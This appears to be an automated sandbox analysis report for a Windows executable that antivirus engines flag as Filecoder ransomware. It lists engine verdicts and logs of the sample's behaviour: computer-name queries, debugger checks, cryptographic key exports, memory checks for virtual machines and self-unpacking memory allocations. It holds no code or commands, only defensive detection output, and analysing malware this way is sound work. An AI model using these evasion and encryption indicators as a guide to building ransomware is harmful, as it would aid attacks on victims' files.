8.8
极危
50 个模型检测该样本为恶意!
重新分析
更多

25e7a047b79eb049df4b60224a2812a80a7fafc54ff789abc84ee7154a887a3c

4e3500cae131418b1a5603df026fbc0d.exe

分析耗时

84s

最近分析

文件大小

2.4MB
静态报毒 动态报毒 0NA103L920 AI SCORE=100 BETACIO EOGJL FILECODER FILECRYPTER GENERIC@ML GENERICRXAA GENETIC GOGOOGLE HHAEJW HIGH CONFIDENCE MALWARE@#2BV4VK27UCXSW MOEVD+N0ICKQ N0DVQIEAU OCCAMY PEGB RDMK SCORE STATIC AI SUSGEN SUSPICIOUS PE UNSAFE VIRRANSOM XPACK ZEXAF ZWW@AE0691G 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Filecoder.f93e18b3 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201228 21.1.5827.0
Tencent Win32.Trojan.Filecoder.Pegb 20201228 1.0.0.1
Kingsoft 20201228 2017.9.26.565
McAfee GenericRXAA-AA!4E3500CAE131 20201228 6.0.6.653
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (50 out of 51 个事件)
Time & API Arguments Status Return Repeated
1619432269.314086
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432269.345086
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432269.361086
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432269.376086
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432273.548086
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619432273.548086
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432294.23143
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432294.26243
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432294.27843
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432294.27843
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432295.37143
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619432295.37143
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432296.16868
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432296.46568
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432296.49668
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432296.54368
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432296.54368
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432299.576258
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619432299.576258
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432304.780506
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432304.905506
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432304.967506
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432304.983506
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432308.546235
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432308.671235
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432308.702235
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432308.718235
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432311.328461
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432311.453461
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432311.469461
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432311.485461
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432314.174063
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432314.284063
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432314.299063
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432314.315063
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432317.112914
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432317.221914
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432317.252914
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432317.252914
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432320.544407
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432320.685407
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432320.700407
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432320.716407
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432323.758649
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432323.868649
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432323.883649
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432323.899649
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432327.593485
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432328.062485
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619432328.265485
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (11 个事件)
Time & API Arguments Status Return Repeated
1619432269.923086
IsDebuggerPresent
failed 0 0
1619432294.46543
IsDebuggerPresent
failed 0 0
1619432296.41868
IsDebuggerPresent
failed 0 0
1619432304.873506
IsDebuggerPresent
failed 0 0
1619432308.640235
IsDebuggerPresent
failed 0 0
1619432311.438461
IsDebuggerPresent
failed 0 0
1619432314.252063
IsDebuggerPresent
failed 0 0
1619432317.190914
IsDebuggerPresent
failed 0 0
1619432320.654407
IsDebuggerPresent
failed 0 0
1619432323.852649
IsDebuggerPresent
failed 0 0
1619432327.843485
IsDebuggerPresent
failed 0 0
Uses Windows APIs to generate a cryptographic key (50 out of 116 个事件)
Time & API Arguments Status Return Repeated
1619432271.189086
CryptExportKey
crypto_handle: 0x006b80c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.095086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.095086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.095086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.142086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.142086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.142086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.173086
CryptExportKey
crypto_handle: 0x006b7f88
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.204086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.204086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.236086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.236086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.236086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.236086
CryptExportKey
crypto_handle: 0x006b74c8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.564086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432272.595086
CryptExportKey
crypto_handle: 0x006b7a08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.158086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.158086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.158086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7908
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.173086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.189086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.189086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.267086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.267086
CryptExportKey
crypto_handle: 0x006b7dc8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.361086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.376086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.376086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.376086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.376086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.392086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.408086
CryptExportKey
crypto_handle: 0x006b7d08
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.486086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.486086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.595086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.595086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.626086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.626086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.626086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.642086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619432273.642086
CryptExportKey
crypto_handle: 0x006b7388
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619432267.064086
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .symtab
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (50 out of 264 个事件)
Time & API Arguments Status Return Repeated
1619432269.486086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02fc0000
success 0 0
1619432269.486086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030d0000
success 0 0
1619432269.829086
NtProtectVirtualMemory
process_identifier: 192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
1619432269.923086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0275a000
success 0 0
1619432269.923086
NtProtectVirtualMemory
process_identifier: 192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f32000
success 0 0
1619432269.923086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02752000
success 0 0
1619432270.111086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02762000
success 0 0
1619432270.189086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030d1000
success 0 0
1619432270.220086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030d2000
success 0 0
1619432270.329086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0278a000
success 0 0
1619432270.626086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02763000
success 0 0
1619432270.829086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02764000
success 0 0
1619432270.861086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279b000
success 0 0
1619432270.861086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02797000
success 0 0
1619432271.001086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0275b000
success 0 0
1619432271.111086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02782000
success 0 0
1619432271.126086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02795000
success 0 0
1619432271.533086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02765000
success 0 0
1619432272.033086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0278c000
success 0 0
1619432272.173086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02783000
success 0 0
1619432272.204086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030c0000
success 0 0
1619432272.470086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02766000
success 0 0
1619432272.564086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279c000
success 0 0
1619432272.892086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02784000
success 0 0
1619432272.892086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02785000
success 0 0
1619432272.892086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02786000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02787000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02788000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02789000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a0000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a1000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a2000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a3000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a4000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a5000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a6000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a7000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a8000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031a9000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031aa000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031ab000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031ac000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031ad000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031ae000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031af000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031b0000
success 0 0
1619432272.908086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031b1000
success 0 0
1619432272.923086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031b2000
success 0 0
1619432272.970086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031b3000
success 0 0
1619432272.970086
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x031b4000
success 0 0
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
